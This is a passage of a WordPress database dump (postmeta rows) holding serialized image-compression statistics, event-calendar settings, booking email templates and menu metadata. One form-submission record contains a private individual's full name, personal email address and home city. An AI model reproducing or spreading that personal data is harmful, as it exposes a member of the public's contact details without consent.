WP-Optimize'),(172527,267409,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:123119;s:12:\"smushed-size\";i:115900;s:15:\"savings-percent\";d:5.86;s:10:\"sizes-info\";a:7:{s:4:\"full\";a:2:{s:8:\"original\";i:123119;s:10:\"compressed\";i:115900;}s:6:\"medium\";a:2:{s:8:\"original\";i:17576;s:10:\"compressed\";i:17225;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:8513;s:10:\"compressed\";i:8447;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:30907;s:10:\"compressed\";i:29906;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:49239;s:10:\"compressed\";i:47853;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:33133;s:10:\"compressed\";i:32203;}s:8:\"tileview\";a:2:{s:8:\"original\";i:40712;s:10:\"compressed\";i:39244;}}}'),(172528,267457,'_wp_attached_file','2022/11/2022-ONLINE-oct-souladv-promo-2.jpg'),(172529,267457,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:578;s:6:\"height\";i:325;s:4:\"file\";s:43:\"2022/11/2022-ONLINE-oct-souladv-promo-2.jpg\";s:8:\"filesize\";i:51570;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:43:\"2022-ONLINE-oct-souladv-promo-2-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15693;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:43:\"2022-ONLINE-oct-souladv-promo-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9028;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:43:\"2022-ONLINE-oct-souladv-promo-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26315;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:43:\"2022-ONLINE-oct-souladv-promo-2-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:37851;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:43:\"2022-ONLINE-oct-souladv-promo-2-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:27875;}s:8:\"tileview\";a:5:{s:4:\"file\";s:43:\"2022-ONLINE-oct-souladv-promo-2-300x325.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:325;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:31166;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(172530,267457,'original-file','2022/11/2022-ONLINE-oct-souladv-promo-2-updraft-pre-smush-original.jpg'),(172531,267457,'smush-complete','1'),(172532,267457,'smush-info','The file was compressed from 50.36 KB to 48.39 KB saving 3.91 percent using WP-Optimize'),(172533,267457,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:51570;s:12:\"smushed-size\";i:49556;s:15:\"savings-percent\";d:3.91;s:10:\"sizes-info\";a:7:{s:4:\"full\";a:2:{s:8:\"original\";i:51570;s:10:\"compressed\";i:49556;}s:6:\"medium\";a:2:{s:8:\"original\";i:15693;s:10:\"compressed\";i:15544;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:9028;s:10:\"compressed\";i:9028;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:26315;s:10:\"compressed\";i:25875;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:37851;s:10:\"compressed\";i:37209;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:27875;s:10:\"compressed\";i:27257;}s:8:\"tileview\";a:2:{s:8:\"original\";i:31166;s:10:\"compressed\";i:30422;}}}'),(176787,267895,'mec_display_cancellation_reason_in_single_page',''),(176788,267895,'boldgrid_hide_page_title','0'),(176789,267895,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(176806,267897,'_menu_item_xfn',''),(176807,267897,'_menu_item_url','https://www.eckankar.org/'),(179311,267897,'_menu_sgpb_popup_id','0'),(176809,247330,'_wp_old_date','2022-09-04'),(176811,247336,'_wp_old_date','2022-09-04'),(176813,265030,'_wp_old_date','2022-09-04'),(176815,264903,'_wp_old_date','2022-09-04'),(176817,264902,'_wp_old_date','2022-09-04'),(176819,264901,'_wp_old_date','2022-09-04'),(176821,247345,'_wp_old_date','2022-09-04'),(176824,247332,'_wp_old_date','2022-09-04'),(176826,266761,'_wp_old_date','2022-09-04'),(176828,266281,'_wp_old_date','2022-09-04'),(176830,247342,'_wp_old_date','2022-09-04'),(176832,261921,'_wp_old_date','2022-09-04'),(176834,247343,'_wp_old_date','2022-09-04'),(176836,247344,'_wp_old_date','2022-09-04'),(179384,268208,'mec_end_time_minutes','0'),(179328,262102,'passster_area_shortcode',''),(176785,267895,'mec_moved_online_link',''),(176786,267895,'mec_cancelled_reason',''),(176784,267895,'mec_event_status','EventScheduled'),(176782,267895,'mec_op','a:0:{}'),(176783,267895,'mec_fields','a:0:{}'),(176773,267895,'mec_booking','a:19:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(176774,267895,'mec_tickets','a:0:{}'),(176775,267895,'mec_fees_global_inheritance','1'),(176776,267895,'mec_fees','a:0:{}'),(176777,267895,'mec_ticket_variations_global_inheritance','1'),(176778,267895,'mec_ticket_variations','a:0:{}'),(176779,267895,'mec_reg_fields_global_inheritance','1'),(176780,267895,'mec_reg_fields','a:0:{}'),(176781,267895,'mec_bfixed_fields','a:0:{}'),(172563,267478,'boldgrid_hide_page_title','0'),(172564,267478,'boldgrid_in_page_containers','1'),(172567,267504,'_wp_attached_file','2022/11/golden-leaf-3.png'),(172568,267504,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:164;s:6:\"height\";i:138;s:4:\"file\";s:25:\"2022/11/golden-leaf-3.png\";s:8:\"filesize\";i:19539;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"golden-leaf-3-150x138.png\";s:5:\"width\";i:150;s:6:\"height\";i:138;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:14815;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(172569,267504,'original-file','2022/11/golden-leaf-3-updraft-pre-smush-original.png'),(172570,267504,'smush-complete','1'),(172571,267504,'smush-info','The file was compressed from 19.08 KB to 5.86 KB saving 69.3 percent using WP-Optimize'),(172572,267504,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:19539;s:12:\"smushed-size\";i:5999;s:15:\"savings-percent\";d:69.3;s:10:\"sizes-info\";a:2:{s:4:\"full\";a:2:{s:8:\"original\";i:19539;s:10:\"compressed\";i:5999;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:14815;s:10:\"compressed\";i:5999;}}}'),(172575,267511,'protect_children',''),(172576,267511,'mec_color',''),(172577,267511,'mec_location_id','122'),(172578,267511,'mec_dont_show_map','0'),(172579,267511,'mec_organizer_id','1'),(172580,267511,'mec_start_date','2022-12-04'),(172581,267511,'mec_start_time_hour','10'),(172582,267511,'mec_start_time_minutes','30'),(172583,267511,'mec_start_time_ampm','AM'),(172584,267511,'mec_start_day_seconds','37800'),(172585,267511,'mec_end_date','2022-12-04'),(172586,267511,'mec_end_time_hour','11'),(172587,267511,'mec_end_time_minutes','30'),(172588,267511,'mec_end_time_ampm','AM'),(172589,267511,'mec_end_day_seconds','41400'),(172590,267511,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-12-04\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-12-04\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(172591,267511,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(172592,267511,'mec_certain_weekdays','a:0:{}'),(172593,267511,'mec_allday','0'),(172594,267511,'mec_hide_time','0'),(172595,267511,'mec_hide_end_time','0'),(172596,267511,'mec_comment',''),(172597,267511,'mec_repeat_status','0'),(172598,267511,'mec_repeat_type',''),(172599,267511,'mec_repeat_interval','1'),(172600,267511,'mec_repeat_end',''),(172601,267511,'mec_repeat_end_at_occurrences',''),(172602,267511,'mec_repeat_end_at_date',''),(172603,267511,'mec_advanced_days','a:0:{}'),(172604,267511,'mec_in_days',''),(172605,267511,'mec_not_in_days',''),(172606,267511,'mec_hourly_schedules','a:0:{}'),(172607,267511,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(172608,267511,'mec_tickets','a:0:{}'),(172609,267511,'mec_fees_global_inheritance','1'),(172610,267511,'mec_fees','a:0:{}'),(172611,267511,'mec_ticket_variations_global_inheritance','1'),(172612,267511,'mec_ticket_variations','a:0:{}'),(172613,267511,'mec_reg_fields_global_inheritance','1'),(172614,267511,'mec_reg_fields','a:0:{}'),(172615,267511,'mec_op','a:0:{}'),(172616,267511,'mec_event_date_submit','20210422105713'),(172617,267511,'mec_read_more',''),(172618,267511,'mec_more_info',''),(172619,267511,'mec_more_info_title',''),(172620,267511,'mec_more_info_target','_self'),(172621,267511,'mec_cost',''),(172622,267511,'mec_currency','a:0:{}'),(172623,267511,'mec_additional_organizer_ids','a:0:{}'),(172624,267511,'mec_additional_location_ids','a:0:{}'),(172625,267511,'one_occurrence','0'),(172626,267511,'mec_timezone','global'),(172627,267511,'mec_countdown_method','global'),(172628,267511,'mec_public','1'),(172629,267511,'mec_bfixed_fields','a:0:{}'),(172630,267511,'mec_fields','a:0:{}'),(172631,267511,'mec_event_status','EventScheduled'),(172632,267511,'mec_moved_online_link',''),(172633,267511,'mec_cancelled_reason',''),(172634,267511,'mec_display_cancellation_reason_in_single_page',''),(172635,267511,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(172636,267511,'passster_activate_global_protection',NULL),(172637,267511,'passster_activate_protection',NULL),(172638,267511,'passster_protection_type','password'),(172639,267511,'_wp_old_date','2022-01-18'),(172640,267511,'boldgrid_in_page_containers','1'),(172643,267511,'_dp_original','266827'),(172642,267511,'_oembed_feb482e9f1973a04e96ed04d346ebf98','{{unknown}}'),(172644,267511,'_edit_lock','1668871257:15'),(172645,267511,'_edit_last','15'),(172646,267512,'_field_224','Melody '),(172647,267512,'_field_225','Dover'),(172648,267512,'_field_226','meredove@yahoo.com'),(172649,267512,'_field_227','CO'),(172650,267512,'_field_228','US'),(172651,267512,'_field_229','a:1:{i:0;s:16:\"Colorado Springs\";}'),(172652,267512,'_form_id','21'),(172653,267512,'_seq_num','160'),(172654,267511,'_thumbnail_id','266373'),(172655,267513,'protect_children',''),(172656,267513,'mec_color',''),(172657,267513,'mec_location_id','118'),(172658,267513,'mec_dont_show_map','0'),(172659,267513,'mec_organizer_id','1'),(172660,267513,'mec_read_more',''),(172661,267513,'mec_more_info',''),(172662,267513,'mec_more_info_title',''),(172663,267513,'mec_more_info_target','_self'),(172664,267513,'mec_cost',''),(172665,267513,'mec_currency','a:0:{}'),(172666,267513,'mec_additional_organizer_ids','a:0:{}'),(172667,267513,'mec_additional_location_ids','a:0:{}'),(172668,267513,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-12-07\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-12-07\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(172669,267513,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(172670,267513,'mec_certain_weekdays','a:0:{}'),(172671,267513,'mec_allday','0'),(172672,267513,'one_occurrence','0'),(172673,267513,'mec_hide_time','0'),(172674,267513,'mec_hide_end_time','0'),(172675,267513,'mec_comment',''),(172676,267513,'mec_timezone','global'),(172677,267513,'mec_countdown_method','global'),(172678,267513,'mec_public','1'),(172679,267513,'mec_start_date','2022-12-07'),(172680,267513,'mec_start_time_hour','7'),(172681,267513,'mec_start_time_minutes','0'),(172682,267513,'mec_start_time_ampm','PM'),(172683,267513,'mec_start_day_seconds','68400'),(172684,267513,'mec_end_date','2022-12-07'),(172685,267513,'mec_end_time_hour','8'),(172686,267513,'mec_end_time_minutes','0'),(172687,267513,'mec_end_time_ampm','PM'),(172688,267513,'mec_end_day_seconds','72000'),(172689,267513,'mec_repeat_status','0'),(172690,267513,'mec_repeat_type',''),(172691,267513,'mec_repeat_interval','1'),(172692,267513,'mec_repeat_end',''),(172693,267513,'mec_repeat_end_at_occurrences',''),(172694,267513,'mec_repeat_end_at_date',''),(172695,267513,'mec_advanced_days','a:0:{}'),(172696,267513,'mec_in_days',''),(172697,267513,'mec_not_in_days',''),(172698,267513,'mec_hourly_schedules','a:0:{}'),(172699,267513,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(172700,267513,'mec_tickets','a:0:{}'),(172701,267513,'mec_fees_global_inheritance','1'),(172702,267513,'mec_fees','a:0:{}'),(172703,267513,'mec_ticket_variations_global_inheritance','1'),(172704,267513,'mec_ticket_variations','a:0:{}'),(172705,267513,'mec_reg_fields_global_inheritance','1'),(172706,267513,'mec_reg_fields','a:0:{}'),(172707,267513,'mec_bfixed_fields','a:0:{}'),(172708,267513,'mec_op','a:0:{}'),(172709,267513,'mec_fields','a:0:{}'),(172710,267513,'mec_event_status','EventScheduled'),(172711,267513,'mec_moved_online_link',''),(172712,267513,'mec_cancelled_reason',''),(172713,267513,'mec_display_cancellation_reason_in_single_page',''),(172714,267513,'boldgrid_hide_page_title','0'),(172715,267513,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(172716,267513,'passster_activate_global_protection',NULL),(172717,267513,'passster_activate_protection',NULL),(172718,267513,'passster_protection_type','password'),(172721,267513,'_dp_original','266104'),(172720,267513,'boldgrid_in_page_containers','1'),(172722,267513,'_edit_lock','1668871631:15'),(172723,267513,'_edit_last','15'),(172724,267513,'_thumbnail_id','267208'),(172725,267514,'protect_children',''),(172726,267514,'mec_color',''),(172727,267514,'mec_location_id','165'),(172728,267514,'mec_dont_show_map','0'),(172729,267514,'mec_organizer_id','1'),(172730,267514,'mec_read_more',''),(172731,267514,'mec_more_info',''),(172732,267514,'mec_more_info_title',''),(172733,267514,'mec_more_info_target','_self'),(172734,267514,'mec_cost',''),(172735,267514,'mec_currency','a:0:{}'),(172736,267514,'mec_additional_organizer_ids','a:0:{}'),(172737,267514,'mec_additional_location_ids','a:0:{}'),(172738,267514,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-02-09\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-02-09\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(172739,267514,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(172740,267514,'mec_certain_weekdays','a:0:{}'),(172741,267514,'mec_allday','0'),(172742,267514,'one_occurrence','0'),(172743,267514,'mec_hide_time','0'),(172744,267514,'mec_hide_end_time','0'),(172745,267514,'mec_comment',''),(172746,267514,'mec_timezone','global'),(172747,267514,'mec_countdown_method','global'),(172748,267514,'mec_public','1'),(172749,267514,'mec_start_date','2023-02-09'),(172750,267514,'mec_start_time_hour','7'),(172751,267514,'mec_start_time_minutes','0'),(172752,267514,'mec_start_time_ampm','PM'),(172753,267514,'mec_start_day_seconds','68400'),(172754,267514,'mec_end_date','2023-02-09'),(172755,267514,'mec_end_time_hour','8'),(172756,267514,'mec_end_time_minutes','30'),(172757,267514,'mec_end_time_ampm','PM'),(172758,267514,'mec_end_day_seconds','73800'),(172759,267514,'mec_repeat_status','0'),(172760,267514,'mec_repeat_type',''),(172761,267514,'mec_repeat_interval','1'),(172762,267514,'mec_repeat_end',''),(172763,267514,'mec_repeat_end_at_occurrences',''),(172764,267514,'mec_repeat_end_at_date',''),(172765,267514,'mec_advanced_days','a:0:{}'),(172766,267514,'mec_in_days',''),(172767,267514,'mec_not_in_days',''),(172768,267514,'mec_hourly_schedules','a:0:{}'),(172769,267514,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(172770,267514,'mec_tickets','a:0:{}'),(172771,267514,'mec_fees_global_inheritance','1'),(172772,267514,'mec_fees','a:0:{}'),(172773,267514,'mec_ticket_variations_global_inheritance','1'),(172774,267514,'mec_ticket_variations','a:0:{}'),(172775,267514,'mec_reg_fields_global_inheritance','1'),(172776,267514,'mec_reg_fields','a:0:{}'),(172777,267514,'mec_bfixed_fields','a:0:{}'),(172778,267514,'mec_op','a:0:{}'),(172779,267514,'mec_fields','a:0:{}'),(172780,267514,'mec_event_status','EventScheduled'),(172781,267514,'mec_moved_online_link',''),(172782,267514,'mec_cancelled_reason',''),(172783,267514,'mec_display_cancellation_reason_in_single_page',''),(172784,267514,'boldgrid_hide_page_title','0'),(172785,267514,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(172786,267514,'passster_activate_global_protection',NULL),(172787,267514,'passster_activate_protection',NULL),(172788,267514,'passster_protection_type','password'),(172789,267514,'boldgrid_in_page_containers','1'),(172790,267514,'_dp_original','265240'),(172791,267514,'_edit_lock','1673801015:15'),(172792,267514,'_edit_last','15'),(172793,267514,'_thumbnail_id','266079'),(172794,267515,'protect_children',''),(172795,267515,'mec_color',''),(172796,267515,'mec_location_id','165'),(172797,267515,'mec_dont_show_map','0'),(172798,267515,'mec_organizer_id','1'),(172799,267515,'mec_read_more',''),(172800,267515,'mec_more_info',''),(172801,267515,'mec_more_info_title',''),(172802,267515,'mec_more_info_target','_self'),(172803,267515,'mec_cost',''),(172804,267515,'mec_currency','a:0:{}'),(172805,267515,'mec_additional_organizer_ids','a:0:{}'),(172806,267515,'mec_additional_location_ids','a:0:{}'),(172807,267515,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-01-12\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-01-12\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(172808,267515,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(172809,267515,'mec_certain_weekdays','a:0:{}'),(172810,267515,'mec_allday','0'),(172811,267515,'one_occurrence','0'),(172812,267515,'mec_hide_time','0'),(172813,267515,'mec_hide_end_time','0'),(172814,267515,'mec_comment',''),(172815,267515,'mec_timezone','global'),(172816,